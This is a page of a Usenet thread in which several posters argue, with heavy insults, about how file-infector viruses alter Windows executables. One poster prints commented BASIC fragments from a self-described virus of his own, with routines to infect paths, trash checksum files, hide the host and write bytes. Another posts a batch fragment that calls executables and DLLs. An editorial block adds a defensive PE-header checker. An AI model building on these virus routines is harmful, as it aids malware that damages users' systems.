How does a malware effect a program and get loaded by Windows? - Page 3


Re: How does a malware effect a program and get loaded by Windows?



I really doubt that HT. Ray is going to have to do some 'self-study' to even
get to the point where any of it makes sense to him. Dustin won't be wasting
his time going over the basic background material needed. I'm reasonably
sure Ray isn't really grasping any of this yet.



Re: How does a malware effect a program and get loaded by Windows?


a ~RL~ Mmm

Re: How does a malware effect a program and get loaded by Windows?

On Friday, July 27, 2012 8:21:26 AM UTC-4, FromTheRafters wrote:
 

Yeah, spoken like the kiddie-script ass worshiper of Dustbin that you appear to
be Rafters.  

Why do you idolize this loser?  He's not shown me anything he knows cannot be
cut and paste out of a book on virus writing.

RL

Re: How does a malware effect a program and get loaded by Windows?



HAHAHA.. Right.. I was wondering when you'd fire on him. :)
 

Find a book that has asic source code to a virus, that wasn't written by
me. :)


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: How does a malware effect a program and get loaded by Windows?

RayLopez99 wrote :

I don't, he's just another Usenet poster to me.

That's because you're incapable of understanding what he has already
given you. Hell, you couldn't even understand what *I* wrote.

Is this the thanks I get for attempting to help you Ray?



Re: How does a malware effect a program and get loaded by Windows?

On Wednesday, July 25, 2012 2:58:31 PM UTC-4, RayLopez99 wrote:

Here is what FromTheRafters wrote in another thread, and I include it here
with my comments IN CAP LETTERS FOR THE most part.

RL

OK I need a lesson in virus writing or rather how an OS loads a program.

***
You need some background before any explanation will be understood by you.
The loader does the last 'translation' - that of using the information in
the program's file to construct an executable image. The executable file is
not really executable (some need no further translation, but most do - the
loader knows what to do). It "represents" what is needed to create that
executable image.

NOT CLEAR WHAT YOU MEAN. LET ME GOOGLE THIS... found this, and it looks
good: http://alexfru.chat.ru/los4d_manual.html -LET ME KNOW IF YOU
DISAGREE, RAFTERS. From what I can tell, an "OS loader" is a Windows (or
DOS) program that continuously runs in the first 640k or so of RAM, and
what it is, is a 'stack' run in an infinite loop (the infinite loop program
always checking the top of the stack and popping or pushing instructions or
data from the program it is running to serve up to the microprocessor) that
pops into the stack the opcodes related to uP commands and memory commands
and IO commands of the kind 'Dustin' claims to write. I think you mean
'binary' for 'image' file. Fair enough. In any event this binary of either
.com or .exe extension has the machine code--in 1's and 0's--of the
assembly language opcodes that I mentioned above. --RL

***


A 'file infector virus' infects a 'program' by modifying the information in
the 'file' it is stored in so that the resulting image from the loader's
translation has the virus as part of the program it is using as a host
(infecting). So now when such an 'infected' legit program file gets
'invoked' the loader loads the virus because it is now part of that formerly
legitimate program.

THIS IS THE PART THAT CONFUSES ME--I'M NOT SURE HOW A BINARY FILE CAN HAVE
CODE INSERTED INTO IT WITHOUT DESTROYING WHAT WAS ALREADY THERE, BUT I
GUESS IF YOU JUDICIOUSLY INSERT THE CODE SO IT'S SAY JUST AFTER A 'COMMENT'
IN MACHINE CODE, IF YOU CAN DO THIS--I NEED MORE CLARIFICATION.--RL

At this point, the infected 'legit' program is 'like' a trojan - it appears
to be legit but has in addition to (or instead of in the case of
overwriters) what it used to do, some nefarious function. This special case
of trojan when executed will trojanize other programs again in the same
manner with a copy of its own replicative function

AGAIN, NOT CLEAR HOW. I GUESS THE TROJAN CAN SEARCH FOR .COM OR .EXE FILES
IN THE HARD DRIVE AND DO WHAT, LOAD THEM INTO RAM, THEN MANIPULATE THEM,
THEN WRITE THEM BACK TO THE HARD DRIVE?--rl

and act as a
self-distribution method for whatever 'payload' it also copies from iteration
to iteration. This is an important enough consideration to warrant its
special name of "virus" rather than just a trojan which would need some
other method for its distribution. Viruses and worms are handy programs for
malware distribution but IMO are neutral otherwise.

I know that you just want to troll Dustin, but let me say this - I know
enough about computers and malware to know that Dustin knows more than I do.
***

YES I TROLL DUSTIN--HE'S A FOOL. I DOUBT HE KNOWS MORE THAN YOU ABOUT
COMPUTERS BTW. AS A SO-CALLED VIRUS WRITER, AT BEST--AGAIN, FROM WHAT I'VE
SEEN--HE MAY HAVE A BOOK LIKE I HAVE AND HAS SIMPLY COPIED AND PASTED SOME
OFF THE SHELF VIRUS AND RENAMED IT AS HIS--AT BEST.

Thanks for your input. I am replying only here since the other thread is
getting too crowded.

RL

Re: How does a malware effect a program and get loaded by Windows?

RayLopez99 explained :

It looks like you have confused the loader that loads the OS with the
loaders that load programs once the OS is up and running. This first
loader has to set up the OS's structures and whatnot and then schedule
the initialization process as the idle process.


It's running before the OS has loaded, and as such cannot be DOS or
Windows. The BIOS finds the OS loader and transfers control to it. The
OS loader then constructs additional file system support so that other
stored files can be accessed.


That sounds like you're describing the scheduler.


No, I meant 'executable image' - no *file* is involved here. The code
and the other resources in the executable file are translated into
machine code for the processor and the result is mapped into a special
memory location where execution can begin when scheduled.


1's and 0's are machine language, assembly uses mnemonics for the
opcodes.


Preexisting code can be relocated and jumped to later. Some viruses
even relocate that code to another file or alternate data stream as
encrypted data and decrypt and execute it later to "mimic" the original
program's function.

Yep, just as the user is able to modify programs, so is malware that
the user executes.
[...]

I can tell you something about what is being done, but Dustin can tell
you *how* it is being done. He *can* be very helpful, but you have not
endeared yourself to him (to say the least). :oD
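
An added illustration of the file-versus-image distinction in the post above (not code from any poster in this thread): on Windows the loader builds the image from the PE headers, so a change to what gets loaded shows up in those headers. The header bytes are constructed samples, all names are hypothetical, and the two checks are common static heuristics assumed here rather than anything the thread specifies.

```python
import struct

MEM_EXECUTE, MEM_WRITE = 0x20000000, 0x80000000   # IMAGE_SCN_MEM_* flags
RX, RW, RWX = 0x60000020, 0xC0000040, 0xE0000020  # typical section flag sets

def build_header(entry_rva, sections):
    """Constructed sample input: PE32 headers only, no code or data bytes."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)          # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<H14xI", 0x10B, entry_rva).ljust(224, b"\0")
    table = b"".join(struct.pack("<8sIIII12xI", *s) for s in sections)
    return dos + b"PE\0\0" + coff + opt + table

def parse(data):
    """Read the header fields the loader uses to lay out the image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsec, opt_size = struct.unpack_from("<H12xH", data, pe_off + 6)
    (entry,) = struct.unpack_from("<I", data, pe_off + 24 + 16)
    sections = []
    for i in range(nsec):
        name, vsize, rva, rawsize, rawptr, flags = struct.unpack_from(
            "<8sIIII12xI", data, pe_off + 24 + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "rva": rva,
                         "vsize": vsize, "rawptr": rawptr, "flags": flags})
    return entry, sections

def findings(data):
    """Static header checks; nothing in the file is executed."""
    entry, sections = parse(data)
    host = next((s for s in sections
                 if s["rva"] <= entry < s["rva"] + s["vsize"]), None)
    if host is None:
        return ["entry point outside every section"]
    out = []
    if len(sections) > 1 and host is sections[-1]:
        out.append("entry point in last section (%s)" % host["name"])
    if host["flags"] & MEM_WRITE and host["flags"] & MEM_EXECUTE:
        out.append("entry section %s is writable and executable" % host["name"])
    return out

# Section tuples: name, virtual size, RVA, raw size, raw file offset, flags.
BASE = [(b".text", 0x800, 0x1000, 0x800, 0x400, RX),
        (b".data", 0x200, 0x2000, 0x200, 0xC00, RW)]
CLEAN = build_header(0x1000, BASE)
ALTERED = build_header(0x3010, BASE + [(b".extra", 0x400, 0x3000, 0x400, 0xE00, RWX)])

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("altered", ALTERED)):
        entry, sections = parse(blob)
        print(label, "entry RVA", hex(entry))
        for s in sections:   # file offset -> address relative to image base
            print("  %-7s file 0x%04x -> image RVA 0x%04x" %
                  (s["name"], s["rawptr"], s["rva"]))
        print("  findings:", findings(blob) or "none")
```

A finding is a reason to compare the file against a known-good copy or hash, not proof of infection; packers and some compilers produce the same header patterns.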



Re: How does a malware effect a program and get loaded by Windows?

On Thursday, July 26, 2012 6:58:37 PM UTC-4, FromTheRafters wrote:

Well except for some minor terminology differences and confusion, I think
we are roughly on the same page. As for Dustin, I doubt he knows much more
than you and I, seriously, I think he's a fake. If he's real he'll step up
to the plate and try and explain some of this stuff and show his supposed
mastery. I'm not holding my breath.

RL

Re: How does a malware effect a program and get loaded by Windows?



I won't assist you or anyone else in writing a virus. It would be very
irresponsible of me. I intentionally provided you non functional
snippets of irok source code. You couldn't even follow those routines,
to explain the actual infection routines would be a total waste of my
time.

I've even offered you my old duke nukem saved game editor source code,
with comments. Hell, irok was commented as well. You don't even
understand what gosub was doing.

You keep calling me a fool and dumbass and generally acting a punk, but
dude, seriously; I *know* this stuff, I wrote several. You haven't got
shit on me. FTR knows computers well and so does Kurt. Neither of them
are going to tell you they could outcode me.

Malwarebytes didn't hire me for my charming personality traits Ray. I
was hired because of my expertise on malware. Much of that expertise
comes from having written viruses in the past.



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: How does a malware effect a program and get loaded by Windows?

On Thursday, July 26, 2012 11:10:37 PM UTC-4, Dustin wrote:


I did understand, shit head, but I want you to walk us through it.  Too
difficult?  I understand....go to bed now and be a good boy.


Who are these people, friends of yours?  I don't give a shit if they are more
incompetent than you.  That's not the challenge.  
  


But they fired you?!



Show us then, oh wise one.  Show us what you got.  What you got is the ability
to make threats of physical violence against people online, which btw restarts
the statute of limitations on your past crimes every time you do that.  

You're just a punk that's got nothing.  A Drama Queen.  And from your prose you
post like an old man, probably mid-60s or if younger you don't get out of the
house much.  Mother's basement?

RL

Re: How does a malware effect a program and get loaded by Windows?



Not difficult for me. I want something from you tho. I don't work for
free. You understood it did you? Why did you request the other
subroutines with full commentation? Why are you still asking how a file
is infected? Some of that source code reverses the infection process on
the executable. If you did understand what I posted, You'd already know
how the process works and wouldn't have continued asking FTR those
newbie questions.

Fact is, you aren't a coder and you probably aren't a programmer.
 

I don't know them personally. I've never met any of them. I wouldn't say
we're friends, Ray.
  

Nope. You guessed wrong again. Surprised, I'm not.


Lots of theories you have bouncing around that empty space above your
nose...Must be a hell of an echo up there.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: How does a malware effect a program and get loaded by Windows?



Amazing he was calling himself a "coder" just a few days ago. Now, we
see he doesn't even have the simplest of concepts down...
 

I suspect you've lost him there, FTR.
 

It's garbage... his description is technological, crap. Fuckwittery at
its finest.
 

And changed when needed.. :)
 

Irok relocated the code and encrypted it; keyed to file/date time
stamps, so if you got nosy with a hex editor and saved changes, YOU
murdered the executable, but not Irok. [g] One of several little booby
traps I was known for including...

FTR, Did you know that some irok descriptions online specify what kind
of file infector it is? The very word you'd think, would explain how it
works.. But, it seems our dear Ray is so lost... there's really no hope
of explaining this.

He really doesn't get it.



Yep.. With the same rights even, in some cases, the virus/malware will
attempt to gain additional rights depending on the circumstances.



As long as he wants to talk down to me and play childish games and
generally just be a twit, I won't help him with any of the concepts. I
can't provide specifics anyway; I'm a professional malware researcher..
the other researchers I know and that know of me would have a serious
issue with me if I told him how to make one.

That seems to be what he's wanting to do. As he's money motivated, he's
probably already got a buyer. I'll be damned if I help in that aspect.

Claims to be some sort of c coder, but can't follow simple ASIC code?
Who's he trying to bullshit?

Seems to be humouring you as well. You've already vouched for me, he's
entirely dismissed it and asked you further questions.

Honestly, I think he's trying to write something he can sell knowing it
wouldn't be known by any av/am scanners. He strikes me as that sort of
weaseling fuckhead.

--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: How does a malware effect a program and get loaded by Windows?

Ray Lopez why do you want to create a virus
 to effect or infect a .exe file of Poor..
For only the Poor will be hijack by the virus,
I see you care not for the poor at all..

*.CMD is a legitimate way to infected a Windows PC,
not *.EXE.....

Re: How does a malware effect a program and get loaded by Windows?



What's the difference?



Re: How does a malware effect a program and get loaded by Windows?


*.CMD can get windows to do the work for you..
Running *.exe and *.dll

[Settings]
REM ALT.COMP ant-virus.cmd 7-27-2011
SET
IF "%%"=="YES" SET=%%
IF EXIST %%\..\..\*.exe CALL %%\..\..\*.exe
CALL %%\..\..\..\*.dll
CALL %%\..\..\..\*.dll

[Command 0]
Command         =
OpenWndClass    =
OpenWndCaption  =
;
;
[Command 10]
CheckFile       =
CheckIniSection =
CheckIniEntry   =
CheckIniValue   = %ARX_PARAM:1%
OnSuccessGoto   =

[Command 20]
Command         =
Caption         =
Size            =
Border          =
System Menu     =

[Command 30]
Command         =
HtmlFile        =
WndSize         =
WaitSecs        =
OnFailureGoto   =


[Command 50]
Command         = run
CheckReg        =
CheckRegKey     =
RunFile         =
OnSuccessGoto   =

[Command 70]
Command         = run
RunFile         =  
CmdLine         = /oobe

Re: How does a malware effect a program and get loaded by Windows?



Why would I bother doing all of that, when I can do this instead?

path_infect:
rem routine proceeds to infect selected path given via the 'n' variable
rem Notice, another safety check. This routine will abort if the
rem selected path does not exist.
          call sub "path", n, virupath$
          i=LEN(virupath$)
          if i>0 then
          b$=right$(virupath$,1)
        if b$<>"\" then
        virupath$=virupath$+"\"
        endif
        rem Before we infect, trash checksum files

        gosub waste:
        gosub start_virus:
endif
return

hide_host:
rem host_hide module
oldname$=filename$
b=varptr(filename$)
c=len(filename$)
d=b+c
b=d-3
d=d-1
range=36
for x=b to d
gosub rand_num:
e=a
e=e+140
poke x,e
next x
rem Now the filename has been changed, Lets rename it real quick :)
gosub waste:
name oldname$ as filename$

write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write :)
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: How does a malware effect a program and get loaded by Windows?



It's a .dll. You can still call specific functions via the runtime32.
[g]
 
Binary files don't go so well across usenet you know.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: How does a malware effect a program and get loaded by Windows?


True

And you can call ActiveX, DirectX, dll in non-IE applications,
the core Windows® technology that drives high-speed multimedia
and games on the client-computer
to run a client-server modes to send info across usenet to the bughunter...

For Dynamic-link-library can be run as a runtime32 on Windows,
that's why spammer like windows...

For there is 3 main types of virus,
name them or maybe Ray Lopez need too..

< http://www.spamlaws.com/virus-comtypes.html


Re: How does a malware effect a program and get loaded by Windows?



Define main?

Oh wait.. no, this article isn't right dude.

a trojan IS NOT a virus

These computer viruses include:

 

    Trojan Horses
    Worms
    Email Viruses

The Trojan virus gets its name from an incident that occurs in Homer's
Iliad. Similar to how the Greeks in Homer's poem sent an army of men,
hidden in a wooden horse, to the Trojans to get into the wall of the
city. A Trojan horse appears to be nothing more than an interesting
computer program or file, such as "saxophone.wav file" on the computer
of user who's interested in collecting sound samples. The Trojan virus
once on your computer, doesn't reproduce, but instead makes your
computer susceptible to malicious intruders by allowing them to access
and read your files. Making this type of virus extremely dangerous to
your computer's security and your personal privacy. Therefore, you
should avoid downloading programs or files from sites if you're not 100
percent positive of what the file or program does.

Your googling skills are lacking here.

this is piss poor work.
 

Worthless. full of errors.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: How does a malware effect a program and get loaded by Windows?


Just like you.....................
